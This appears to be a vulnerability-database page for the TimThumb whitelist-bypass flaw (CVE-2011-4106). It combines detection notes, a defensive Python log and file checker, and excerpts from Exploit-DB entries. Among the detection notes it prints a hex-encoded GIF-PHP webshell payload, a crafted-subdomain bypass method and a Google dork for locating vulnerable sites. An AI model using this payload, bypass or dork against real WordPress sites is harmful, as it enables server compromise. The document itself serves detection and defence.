CVE-2011-4106
Published: 2013-10-26
Priority: P2 (75), medium; CVSS 2.0: 6.8
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
Tags: ITW, EXPLOIT, VulnCheck KEV
Exploited in the wild
EPSS: 23.16% (97.5th percentile)
TimThumb (timthumb.php) before 2.0 does not validate the entire source with the domain white list, which allows remote attackers to upload and execute arbitrary code via a URL containing a white-listed domain in the src parameter, then accessing it via a direct request to the file in the cache directory, as exploited in the wild in August 2011.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| binarymoon | timthumb | <= 1.99 | — |
Detection & IOCs (extracted from sources)
Payload bytes (IOC):
\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\xFF\xFF\xFF\x00\x00\x00\x21\xF9\x04\x01\x00\x00\x00\x00\x2C\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02\x44\x01\x00\x3B\x00\x3C\x3F\x70\x68\x70\x20\x40\x65\x76\x61\x6C\x28\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D\x64\x27\x5D\x29\x3B\x20\x3F\x3E\x00
- Monitor HTTP requests to timthumb.php (and aliases such as thumb.php, picsize.php, image.php) where the `src` GET parameter contains a subdomain-crafted URL embedding a whitelisted domain (e.g., blogger.com.evil.com) to bypass the domain whitelist check.
- Alert on newly created .php files inside WordPress cache directories (e.g., wp-content/*/cache/*.php, wp-content/uploads/*/cache/*.php); these are the webshells dropped by the exploit.
- Detect the malicious polyglot payload: a GIF89a header (bytes 47 49 46 38 39 61) immediately followed by PHP eval($_GET['cmd']) code (bytes 3C 3F 70 68 70 20 40 65 76 61 6C 28 24 5F 47 45 54 5B 27 63 6D 64 27 5D 29 3B 20 3F 3E) in files fetched remotely by timthumb.
- For the User Avatar plugin variant, watch for requests supplying an attacker-controlled `allowedSites[]` parameter alongside a crafted `src` URL, which requires register_globals to be enabled.
- For the Rekt Slideshow plugin, the src parameter value is Base64-encoded before being passed to picsize.php; decode Base64 values in the src parameter when inspecting requests to this endpoint.
- Use the Google dork `inurl:timthumb ext:php -site:googlecode.com -site:google.com` to identify exposed timthumb.php endpoints on internet-facing WordPress installations.
- Caveat: only TimThumb versions 1.x through 1.32 cache the remote file as a .php file; version 1.33 changed the cache filename extension and does not save as .php, limiting direct code execution via the cache path.
- Caveat: the User Avatar plugin exploit variant additionally requires PHP register_globals to be enabled on the server and at least one user account to have an avatar directory.
- Caveat: cache directory paths vary per plugin and host configuration; the shell drop location must be confirmed per deployment (e.g., external_md5(src).php vs md5(src).php naming differs between plugin versions).
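The detection notes above can be turned into a small defender-side checker. The following Python is an added example written for this page; it is not code from the CVE record, from TimThumb, or from any of the plugins named here. It implements the three checks the notes describe: a strict host match against an allowed-sites list (the check that a bare "does the src contain a whitelisted name?" test lacks, so blogger.com.evil.com is rejected), a scan of access-log lines for timthumb-style endpoints whose src host fails that check (decoding the Base64-wrapped src used by the Rekt Slideshow variant, which goes slightly beyond the single case in the text), and a byte check for the GIF89a-then-PHP polyglot shape to sweep cache directories with. The allowed-sites list, the log lines and the sample bytes are constructed for the example; the endpoint names come from the notes above.

```python
"""
Added defender-side example for CVE-2011-4106 (not code from the CVE record,
TimThumb or any plugin). Checks shown:
  1. host_allowed(): strict host match against an allowed-sites list.
  2. suspicious_src_requests(): access-log scan for timthumb-style endpoints
     whose src host is not strictly allowed; the "whitelisted name embedded in
     a foreign host" shape is labelled separately.
  3. is_gif_php_polyglot(): GIF89a header followed by a PHP open tag.
The allowed-sites list, log lines and byte samples below are constructed.
"""
import base64
import binascii
import re
from urllib.parse import parse_qs, quote, urlparse

# Constructed allowed-sites list (assumption; TimThumb ships its own list).
ALLOWED_SITES = ["flickr.com", "picasa.com", "blogger.com", "wordpress.com", "img.youtube.com"]
# Endpoint names taken from the detection notes.
THUMB_SCRIPTS = ("timthumb.php", "thumb.php", "picsize.php", "image.php")
LOG_REQUEST = re.compile(r'"(?:GET|POST) (?P<path>\S+) HTTP/[\d.]+"')


def host_allowed(url, allowed=ALLOWED_SITES):
    """True only if the URL's host is an allowed domain or a subdomain of one.
    Matching on label boundaries is what rejects blogger.com.evil.com."""
    host = (urlparse(url).hostname or "").lower().rstrip(".")
    if not host:
        return False
    return any(host == d or host.endswith("." + d) for d in (a.lower() for a in allowed))


def embeds_allowed_domain(url, allowed=ALLOWED_SITES):
    """Loose test (an allowed name appears anywhere in the host). Used only to
    explain why a rejected request would look legitimate to a substring check."""
    host = (urlparse(url).hostname or "").lower()
    return any(a.lower() in host for a in allowed)


def normalise_src(value):
    """Return the URL carried by a src value; the Rekt Slideshow variant passes
    it Base64-encoded, so decode when the raw value is not already a URL."""
    if "://" in value:
        return value
    try:
        decoded = base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return value
    return decoded if "://" in decoded else value


def suspicious_src_requests(log_lines, allowed=ALLOWED_SITES):
    """Yield (endpoint, src_url, reason) for requests whose src host fails the
    strict check. src values without a host (local files) are skipped: they are
    not the remote-fetch path this CVE concerns."""
    findings = []
    for line in log_lines:
        m = LOG_REQUEST.search(line)
        if not m:
            continue
        req = urlparse(m.group("path"))
        if not req.path.endswith(THUMB_SCRIPTS):
            continue
        for raw in parse_qs(req.query).get("src", []):
            src = normalise_src(raw)
            if not urlparse(src).hostname or host_allowed(src, allowed):
                continue
            reason = ("whitelisted name embedded in foreign host"
                      if embeds_allowed_domain(src, allowed) else "host not whitelisted")
            findings.append((req.path, src, reason))
    return findings


GIF89A = b"GIF89a"
PHP_OPEN = b"<?php"


def is_gif_php_polyglot(data):
    """GIF89a magic with a PHP open tag anywhere after it: the cache-file shape
    that an image-header check alone would accept."""
    return data.startswith(GIF89A) and PHP_OPEN in data[len(GIF89A):]


# ---- constructed samples (not real traffic, not the real payload bytes) ----
_B64_SRC = quote(base64.b64encode(b"http://attacker.invalid/s.gif").decode(), safe="")
SAMPLE_LOG = [
    '198.51.100.1 - - [10/Aug/2011:12:00:01 +0000] "GET /wp-content/themes/t/timthumb.php?src=http://img.youtube.com/vi/abc/0.jpg&w=100 HTTP/1.1" 200 512',
    '198.51.100.2 - - [10/Aug/2011:12:00:02 +0000] "GET /wp-content/themes/t/timthumb.php?src=http://blogger.com.attacker.invalid/x.gif HTTP/1.1" 200 97',
    '198.51.100.3 - - [10/Aug/2011:12:00:03 +0000] "GET /wp-content/plugins/p/thumb.php?src=http%3A%2F%2Fattacker.invalid%2Fa.gif HTTP/1.1" 200 97',
    '198.51.100.4 - - [10/Aug/2011:12:00:04 +0000] "GET /index.php HTTP/1.1" 200 1000',
    '198.51.100.5 - - [10/Aug/2011:12:00:05 +0000] "GET /wp-content/plugins/rekt-slideshow/picsize.php?src=' + _B64_SRC + ' HTTP/1.1" 200 97',
]
# A 1x1 GIF89a header prefix, plain and with a harmless PHP tag appended.
SAMPLE_CLEAN_GIF = GIF89A + b"\x01\x00\x01\x00\x80\x00\x00" + bytes(30)
SAMPLE_POLYGLOT = SAMPLE_CLEAN_GIF + b"<?php echo 'constructed sample'; ?>"

if __name__ == "__main__":
    for endpoint, src, reason in suspicious_src_requests(SAMPLE_LOG):
        print(f"{endpoint}: src={src} ({reason})")
    print("polyglot:", is_gif_php_polyglot(SAMPLE_POLYGLOT), is_gif_php_polyglot(SAMPLE_CLEAN_GIF))
```

Run against the constructed log it reports the three remote-fetch requests that fail the strict host check and leaves the legitimate img.youtube.com request alone; point `suspicious_src_requests` at real access-log lines and `is_gif_php_polyglot` at the contents of files under the cache directories named above to use it in an investigation. The byte check deliberately looks only for a PHP open tag after the GIF magic rather than the exact eval payload from the IOC, so variants with a different PHP body are still caught.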
CVSS provenance
- NVD (CVSS v2.0): 6.8 MEDIUM, AV:N/AC:M/Au:N/C:P/I:P/A:P
- VulnCheck: 6.8 MEDIUM
GHSA
GHSA-h589-v7r4-6pgf (ghsa_unreviewed · 2022-05-17): CVE-2011-4106 [MEDIUM] CWE-20
Description: identical to the NVD description above.
VulnCheck
binarymoon timthumb Improper Input Validation (vulncheck · 2011 · CVSS 6.8 · CVE-2011-4106 [MEDIUM])
Description: identical to the NVD description above.
Affected: binarymoon timthumb
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://nvd.nist.gov/vuln/detail/CVE-2011-4106; https://www.cve.org/CVERecord?id=CVE-2011-4106; https://www.imperva.com/blog/crimeops-of-the-kashmirblack-botnet-part-ii/
No detection rules found.
Exploit-DB
Multiple WordPress Plugins - 'timthumb.php' File Upload (exploitdb · 2011-09-19 · CVE-2011-4106)
---
# Exploit Title: Multiple Wordpress timthumb.php reuse vulnerabilities
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
---
Description
---
The following Wordpress plugins reuse a vulnerable version of the timthumb.php library.
By hosting a malicious GIF file with PHP code appended to the end on an attacker controlled
domain such as blogger.com.evil.com and then providing it to the script through the
src GET parameter, it is possible to upload a shell and execute arbitrary code on the webserver.
Reference: http://www.exploit-db.com/exploits/17602/
# Plugin: Category Grid View Gallery Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/category-gr
Exploit-DB
WordPress Plugin TimThumb 1.32 - Remote Code Execution (exploitdb · 2011-08-03 · CVE-2011-4106)
---
# Exploit Title: WordPress TimThumb Plugin - Remote Code Execution
# Google Dork: inurl:timthumb ext:php -site:googlecode.com -site:google.com
# Date: 3rd August 2011
# Author: MaXe
# Software Link: http://timthumb.googlecode.com/svn-history/r141/trunk/timthumb.php
# Version: 1.32
# Screenshot: See attachment
# Tested on: Windows XP + Apache + PHP (XAMPP)
WordPress TimThumb (Theme) Plugin - Remote Code Execution
Versions Affected:
1.* - 1.32 (Only version 1.19 and 1.32 were tested.)
(Version 1.33 did not save the cache file as .php)
Info: (See references for original advisory)
TimThumb is an image resizing utility, widely used in many WordPress themes.
External Links:
http://www.binarymoon.co.uk/projects/timthumb/
http://
No writeups or analysis indexed.
References
- http://code.google.com/p/timthumb/issues/detail?id=212
- http://markmaunder.com/2011/08/01/zero-day-vulnerability-in-many-wordpress-themes/
- http://markmaunder.com/2011/08/02/technical-details-and-scripts-of-the-wordpress-timthumb-php-hack/
- http://www.binarymoon.co.uk/2011/08/timthumb-2/
- http://www.exploit-db.com/exploits/17602
- http://www.exploit-db.com/exploits/17872
- http://www.openwall.com/lists/oss-security/2011/11/03/4